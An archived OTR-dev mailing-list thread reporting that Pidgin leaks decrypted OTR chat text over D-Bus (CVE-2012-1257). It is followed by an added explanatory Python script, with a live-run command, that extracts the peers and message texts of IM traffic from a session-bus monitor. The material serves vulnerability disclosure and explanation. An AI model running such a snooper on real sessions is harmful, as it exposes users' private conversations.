On 12/21/2011 02:49 AM, Dimitris Glynos wrote:
> On 12/21/2011 01:11 AM, k...@hxbc.us wrote:
>> On Tue, 20 Dec 2011 12:02:38 +0200, Dimitris Glynos wrote:
>>> Hello all,
>>>
>>> I was wondering if pidgin could allow for certain chat types
>>> to be flagged as private and not transmit these over dbus.
>>> I don't know how much dbus is hardwired to pidgin (is it used
>>> also for capturing the messages displayed on the pidgin GUI?)
>>> but the fact that a local attacker can access OTR plaintext
>>> from a dbus session monitor is quite unnerving.
>>
>> a local attacker can already ptrace the pidgin process and do
>> pretty much anything.
>
> Yes, the word 'local' is used incorrectly in the original post.
> Consider a remote attacker that exploits some app running
> in the same desktop session as pidgin. It is trivial
> to fork-exec a dbus session monitor from there and retrieve the
> sensitive info.
>
> Now, regarding ptrace: although it was generally possible in
> the past to attach to processes of the same user, this has
> been restricted somewhat in modern distros. Specifically,
> distros like Ubuntu allow (non-root) ptrace only to
> processes that are children of the ptrace-caller.
>
> For more info on this, have a look here:
> https://wiki.ubuntu.com/SecurityTeam/Roadmap/KernelHardening#ptrace_Protection
>
> Hope this clarifies things a bit,
Coming back to this after a while. You may now find an advisory and a
proof-of-concept script for the DBUS info leak here:

http://census-labs.com/news/2012/02/25/pidgin-otr-info-leak/

This issue has received CVE-2012-1257.

It would be good to see this issue addressed in the next release of
pidgin and pidgin-otr. Most users would be surprised to find that their
private chatting is somehow accessible to other apps.

Best regards,
Dimitris

--
http://census-labs.com -- IT security research, development and services

_______________________________________________
OTR-dev mailing list
OTR-dev@lists.cypherpunks.ca
http://lists.cypherpunks.ca/mailman/listinfo/otr-dev
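To make concrete what "fork-exec a dbus session monitor and retrieve the sensitive info" means in practice, here is an added example that is neither code from this thread nor the census-labs proof-of-concept. It parses the text that `dbus-monitor --session` prints and pulls out the message bodies carried by libpurple's IM signals, i.e. exactly what any unprivileged process in the same desktop session can read without root and without ptrace. The interface name `im.pidgin.purple.PurpleInterface` and object path `/im/pidgin/purple/PurpleObject` are libpurple's real D-Bus names; the argument layouts of the `ReceivedImMsg` and `SendingImMsg` signals are assumed here from libpurple's `received-im-msg`/`sending-im-msg` signals, and the capture text is constructed for the example, not a real recording.

```python
import re
import sys
from dataclasses import dataclass
from typing import List, Optional

# Constructed capture (not a real recording) of what `dbus-monitor --session`
# prints while Pidgin is running.  Assumed argument layouts:
#   ReceivedImMsg(account, sender, message, conversation, flags)
#   SendingImMsg(account, receiver, message)
# The third signal is unrelated desktop noise and must be ignored.
SAMPLE_CAPTURE = """\
signal sender=:1.42 -> dest=(null destination) serial=17 path=/im/pidgin/purple/PurpleObject; interface=im.pidgin.purple.PurpleInterface; member=ReceivedImMsg
   int32 3
   string "alice@example.org"
   string "the meeting is at 9, bring the usb stick"
   int32 8847
   uint32 0
signal sender=:1.42 -> dest=(null destination) serial=18 path=/im/pidgin/purple/PurpleObject; interface=im.pidgin.purple.PurpleInterface; member=SendingImMsg
   int32 3
   string "alice@example.org"
   string "ok, see you there"
signal sender=:1.7 -> dest=(null destination) serial=19 path=/org/freedesktop/Notifications; interface=org.freedesktop.Notifications; member=NotificationClosed
   uint32 12
   uint32 2
"""

PURPLE_IFACE = "im.pidgin.purple.PurpleInterface"
# Only the two IM signals whose first two string arguments are (peer, text).
IM_SIGNALS = {"ReceivedImMsg", "SendingImMsg"}

HEADER_RE = re.compile(r"^signal .*?interface=(?P<iface>[^;]+); member=(?P<member>\S+)")
STRING_RE = re.compile(r'^\s+string "(?P<value>.*)"$')


@dataclass
class LeakedMessage:
    direction: str  # "in" for ReceivedImMsg, "out" for SendingImMsg
    peer: str
    text: str


def split_signals(capture: str) -> List[List[str]]:
    """Group dbus-monitor output into one list of lines per signal."""
    blocks: List[List[str]] = []
    for line in capture.splitlines():
        if line.startswith("signal "):
            blocks.append([line])
        elif blocks:
            blocks[-1].append(line)
    return blocks


def message_from_block(block: List[str]) -> Optional[LeakedMessage]:
    """Return the message carried by a libpurple IM signal, else None."""
    header = HEADER_RE.match(block[0])
    if not header or header["iface"] != PURPLE_IFACE or header["member"] not in IM_SIGNALS:
        return None
    strings = [m["value"] for m in map(STRING_RE.match, block[1:]) if m]
    if len(strings) < 2:
        return None  # truncated or unexpected signal: skip rather than guess
    direction = "in" if header["member"] == "ReceivedImMsg" else "out"
    return LeakedMessage(direction, strings[0], strings[1])


def parse_capture(capture: str) -> List[LeakedMessage]:
    """Everything a same-session process learns just by watching the bus."""
    found = []
    for block in split_signals(capture):
        msg = message_from_block(block)
        if msg is not None:
            found.append(msg)
    return found


if __name__ == "__main__":
    # Read a live `dbus-monitor --session` stream from stdin if piped,
    # otherwise demonstrate on the constructed capture.
    capture = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CAPTURE
    for m in parse_capture(capture):
        print(f"{m.direction:>3} {m.peer}: {m.text}")
```

Run it as `dbus-monitor --session | python3 leak.py` from any shell in the same session to see the live stream; nothing in the example distinguishes an OTR-protected conversation from a plaintext one, which is the point of the thread: by the time the signal is on the bus, the text is already decrypted.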